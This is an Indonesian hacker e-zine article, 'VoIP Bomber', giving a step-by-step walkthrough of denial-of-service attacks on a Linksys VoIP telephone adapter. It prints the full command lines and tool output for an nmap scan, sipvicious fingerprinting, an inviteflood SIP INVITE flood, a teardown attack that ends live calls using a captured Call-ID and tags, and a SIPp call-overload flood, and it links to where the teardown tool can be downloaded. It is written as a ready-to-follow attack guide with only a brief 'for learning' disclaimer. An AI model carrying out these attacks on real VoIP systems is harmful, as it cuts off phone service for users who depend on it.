__ __ /\ \ ___ ___ ___ __ __ __ ___ _ __ /\_\ \_\ \ / __`\ /' __` __`\ /'__`\ /'_ `\ /'__`\ / __`\/\`'__\ \/\ \ /'_` \ /\ \L\ \/\ \/\ \/\ \/\ __//\ \L\ \/\ \L\.\_ __/\ \L\ \ \ \/ __\ \ \/\ \L\ \ \ \____/\ \_\ \_\ \_\ \____\ \____ \ \__/.\_\/\_\ \____/\ \_\/\_\\ \_\ \___,_\ \/___/ \/_/\/_/\/_/\/____/\/___L\ \/__/\/_/\/_/\/___/ \/_/\/_/ \/_/\/__,_ / /\____/ \_/__/ OMEGA|ZINE RELEASE 04 Author : lirva32 || lirva32[at]yahoo[dot]com Online @ www.omega.or.id :: http://ezine.omega.or.id == VoIP Bomber == Ya, saya akan melakukan penyerangan terhadap perangkat VoIP yang ada di rumah saya, perangkat tersebut hanya : VoIP ATA. VoIP...??? ATA...?? ya, VoIP = Voice Over IP, sedangkan ATA = Analog Telephone Adapter. Intinya adalah sebuah perangkat yang membuat telephone rumahan (analog phone) bisa dijadikan sebagai perangkat VoIP. Nah, yang menjadi target saya adalah VoIP ATA. Perangkat ini akan saya lakukan tindakan destruktif sehingga VoIP ATA tidak bisa digunakan untuk sementara dan terputus dari jalur VoIP services. Teknik penyerangan ini berlaku pada semua pemodelan VoIP alias tidak terbatas pada topologi yang disimulasikan. Persiapan : 1. Laptop 2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution 3. Wlan0, saya mempergunakan jaringan wireless dalam penyerangan Kegiatan Penyerangan : 1. Memastikan IP pada interface wlan0 Ya, saya harus memastikannya karena saya terkoneksi pada sebuah Wireless AP Router sehingga DHCP server memberikan IP untuk devices yang saya pergunakan : root@bt:~#ifconfig ------------------------------------------------------------------------ wlan0 Link encap:Ethernet HWaddr 00:1c:bf:00:Se:fb inet addr:192.168.1.68 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::21c:bfff:fe00:Sefb/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6277 errors:0 dropped:0 overruns:0 frame:0 TX packets:20451 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6358679 (6.3 MB) TX bytes:1733016 (1.7 MB) ------------------------------------------------------------------------ Analisa : Nah, laptop saya sudah mendapatkan IP dari DHCP Server, yaitu : 192.168.1.68, mari lanjutkan pada langkah berikutnya. 2. Melakukan scanning untuk mengidetifikasikan host live Pada langkah pertama sudah didapatkan IP : 192.168.1.68, maka langkah berikutnya saya akan melakukan pencarian informasi yang lebih mendalam dengan melakukan scanning massal. Disini hanya diperlukan sedikit analisa saja, yaitu menentukan 1 segment range IP yang akan discanning massal, maka 1 range IP tersebut adalah IP : 192.168.1.1 sampai dengan IP : 192.168.1.254. Saya mempergunakan NMAP dengan metoda "intense scan & no ping", dengan perintah sbb : root@bt:~# nmap -T4 -A -v -Pn 192.168.1.1-254 ------------------------------------------------------------------------------ 1 Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-31 23:55 WIT 2 NSE: Loaded 57 scripts for scanning. 3 Initiating ARP Ping Scan at 23:55 4 Scanning 67 hosts [1 port/host] 5 Completed ARP Ping Scan at 23:55, 1.87s elapsed (67 total hosts) 6 Initiating Parallel DNS resolution of 67 hosts. at 23:55 7 Completed Parallel DNS resolution of 67 hosts. at 23:55, 0.05s elapsed 8 Nmap scan report for 192.168.1.2 [host down] 9 10 11 12 Initiating SYN Stealth Scan at 23:56 13 Scanning 192.168.1.80 [1000 ports] 14 Discovered open port 80/tcp on 192.168.1.80 15 Completed SYN Stealth Scan at 23:56, 1.48s elapsed (1000 total ports) 16 Initiating Service scan at 23:56 17 Scanning 1 service on 192.168.1.80 18 Completed Service scan at 23:56, 5.01s elapsed (1 service on 1 host) 19 Initiating OS detection (try #1) against 192.168.1.80 20 NSE: Script scanning 192.168.1.80 21 Initiating NSE at 23:56 22 Completed NSE at 23:56, 9.03s elapsed 23 Nmap scan report for 192.168.1.80 24 Host is up (0.0026s latency). 25 Not shown: 999 closed ports 26 PORT STATE SERVICE VERSION 27 80/tcp open tcpwrapped 28 MAC Address: 00:23:69:7C:2B:E4 (Cisco-Linksys) 29 Device type: VoIP adapter 30 Running: Sipura embedded 31 OS details: Sipura SPA-1001 or SPA-3000 VoIP adapter 32 Network Distance: 1 hop 33 TCP Sequence Prediction: Difficulty=262 (Good luck!) 34 IP ID Sequence Generation: Incremental 35 Read data files from: /usr/local/share/nmap 36 OS and Service detection performed. Please report any incorrect results 37 at http://nmap.org/submit/ . 38 Nmap done: 254 IP addresses (3 hosts up) scanned in 81.30 seconds 39 Raw packets sent: 4673 (203.516KB) | Rcvd: 3087 (129.594KB) ------------------------------------------------------------------------------ Analisa: Wah...hasil laporan NMAP begitu panjang dan menggoda...pasti disukai para wanita...lol, sehingga didapatkan informasi bahwa pada IP : 192.168.1.80 terindikasi sebagai perangkat VoIP. Kok tau itu perangkat VoIP...? gini masbro... perhatikan pada baris 29,30,31. Baris-baris tersebut menunjukan kalau itu adalah perangkat VoIP. Perhatikan juga pada baris 27 "80/tcp open tcpwrapped" yang mengindikasikan bahwa perangkat VoIP tersebut mengaktifkan metoda penyetingan berbasis web base (http) yang bisa menjadi target penyerangan berikutnya..lol Untuk lebih detailnya maka akan dilakukan proses "fingerprint" pada langkah berikutnya. 3. FingerPrint Okay...kegiatan ini hanyalah kegiatan untuk memastikan bahwa target yang menjadi incaran adalah benar-benar target alias kagak salah sasaran. root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 +-------------------------------------------------------------------------+ | SIP Device | User Agent | Fingerprint | +-------------------------------------------------------------------------+ | 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS) | +-------------------------------------------------------------------------+ Analisa : Uhhhuuuyyyy... ternyata benar bahwa IP 192.168.1.80 adalah perangkat VoIP dengan SIP Port 5060. Tidak hanya itu, merk dan series perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS). Mari mang....kita lanjutkan pada proses fingerprint yang lebih bermutu : root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d ----------------------------------------------------------------------------------------- 1 ('192.168.1.80', 5060) 2 SIP/2.0 404 Not Found 3 To: "sipvicious";tag=388074baa08bb653i 4 From: "sipvicious";tag=63306138303135303133633401373935303131393234 5 Call-ID: 785522139741125439084511 6 CSeq: 1 OPTIONS 7 Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3073480069 8 Server: Linksys/PAP2T-3.1.15(LS) 9 Content-Length:0 +-------------------------------------------------------------------------+ 10 | SIP Device | User Agent | Fingerprint | 11 +--------------------------------------------------------------------------+ 12 | 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS)| +-------------------------------------------------------------------------+ ----------------------------------------------------------------------------------------- Analisa: Pusing.....?? santai gan... dari hasil fingerprint tersebut, kita mendapatkan : 1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060 2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0 4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234 5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511 6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069 7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS) Sungguh...mangtabs sekali informasi2 tersebut dan sangat berguna dalam melakukan penyerangan VoIP. 4. Penyerangan Mari kita lakkukan penyerangan... ingat penyerangan iini hanya untuk pembelajaran saja, segala tindakan destruktif saya tidak bertanggung jawab. * InviteFlood : --------------- Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan komunikasi dengan banyak user. root@bt:/pentest/voip/inviteflood# ./inviteflood root@bt:/pentest/voip/inviteflood# ./inviteflood wlan0 100 192.168.1.80 192.168.1.80 10000000 +-----------------------------------------------+ | inviteflood - Version 2.0 | | June 09, 2006 | | | | source IPv4 addr:port = 192.168.1.68:9 | | dest IPv4 addr:port = 192.168.1.80:5060 | | targeted UA = 100@192.168.1.80 | | | | Flooding destination with 10000000 packets | | sent: 13165085 | | exiting... | +-----------------------------------------------+ Hasil selama pengiriman paket data berlangsung : * root@bt:/pentest/voip/sipp# ping 192.168.1.80 PING 192.168.1.80 (192.168.1.80) 56(84) bytes of data (berhenti tanpa respon apapun) * Port 80 HTTP pun tewas * Jalur VoIP tidak bisa dihubungi * VoIP Enduser mengalami terputusnya koneksi * Semakin banyak jumlah paket dalam yang dikirim berarti semakin lama tewasnya VoIP devices target !! * tearDown attacking : ---------------------- Penyerangan dengan melumpuhkan semua client (user) yang terkoneksi pada VoIP devices. O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena itu Anda harus mengambilnya a.k.a download di : http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi ini membutuhkan Ruby 1.8 keatas. Untuk menggunakan "tearDown" diperlukan hasil analisa dari fingerprint (proses 3), yaitu : 1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060 2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1 3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0 4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234 5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511 6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069 7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS) Mari gunakan informasi tersebut sebagai parameter penyerangan dengan tearDown, sbb : root@bt:/pentest/voip/teardown# ./teardown ./teardown wlan0 100 192.168.1.80 192.168.1.80 785522139741125439084511 63306138303135303133633401373935303131393234 388074baa08bb653i0 +--------------------------------------------------------------------------+ | teardown - Version 1.0 | | Feb. 17, 2006 | | | | source IPv4 addr:port = 192.168.1.68 | | dest IPv4 addr:port = 192.168.1.80 | | target UA = 100@192.168.1.80 | | From Tag = 63306138303135303133633401373935303131393234 | | To Tag = 388074baa08bb653i0 | | Call ID = 785522139741125439084511 | +--------------------------------------------------------------------------+ Hasil penyerangan : * Jalur komunikasi VoIP yang dipergunakan oleh user terputus !! * SIP protocol attacking : -------------------------- Penyerangan dengan cara memberikan koneksi "total-call" user yang berlebihan sehingga SIP tidak lagi mampu memberikan layanan. root@bt:/pentest/voip/sipp# ./sipp -sn uac root@bt:/pentest/voip/sipp# ./sipp -sn uac 192.168.1.80 +-------------------------------------------------------------------------------+ | Resolving remote host '192.168.1.80'... Done. | +------------------------------ Scenario Screen -------- [1-9]: Change Screen --+ | Call-rate(length) Port Total-time Total-calls Remote-host | | 16.0(0 ms)/1.000s 5060 58.96 s 365 192.168.1.80:5060(UDP) | | | | 1 new calls during 0.854 s period 0 ms scheduler resolution | | 48 calls (limit 48) Peak was 48 calls, after 58 s | | 1 Running, 238 Paused, 26 Woken up | | 0 dead call msg (discarded) 0 out-of-call msg (discarded) | | 3 open sockets | | | | Messages Retrans Timeout Unexpected-Msg | | INVITE ----------> 365 436 29 | | 100 <---------- 0 0 0 288 | | 180 <---------- 0 0 0 0 | | 183 <---------- 0 0 0 0 | | 200 <---------- E-RTD1 0 0 0 0 | | ACK ----------> 0 0 | | Pause [ 0ms] 0 0 | | BYE ----------> 0 0 0 | | 200 <---------- 0 0 0 0 | | | +------------------------------ Test Terminated --------------------------------+ Hasil penyerangan : * Layanan SIP terganggu bahkan terhenti karena adanya total-call yang berlebihan karena limit-calls = 48 sedangkan total-calls sudah mencapai = 365. * Penyerangan bisa dilipatgandakan dengan menekah tombol "+" (tanda tanda kutip) Akhirnya selesai sudah tulisan ini saya buat, tiada maksud untuk menambah kejahatan otak... tapi ini adalah sejati2nya ilmu yang memang siapapun harus mengetahuinya, semoga saja tetap tidak memberikan kotor pada otak Anda semuanya. Selamat belajar Indonesia...!!!! Greetz : - Echo|Staff, - Ibunda tercinta... tanpa perjuangan bunda aku tidak akan bisa seperti sekarang ini...thx bunda...;) - MyDaughter : Faiza Debian dan Fivana Gutsy "Anakku...ini dunia ayahmu..:)" - kang Arif s4kitj1wa, Flexus, SheraYusuf, etc - AllMyStudent@STMIK Bina Insani - RNDC, DevilzCode, MyAlmamater : FTI_Univ_Budi_Luhur, IndonesianLockPicking. kritik & saran kirimkan ke lirva32@yahoo.com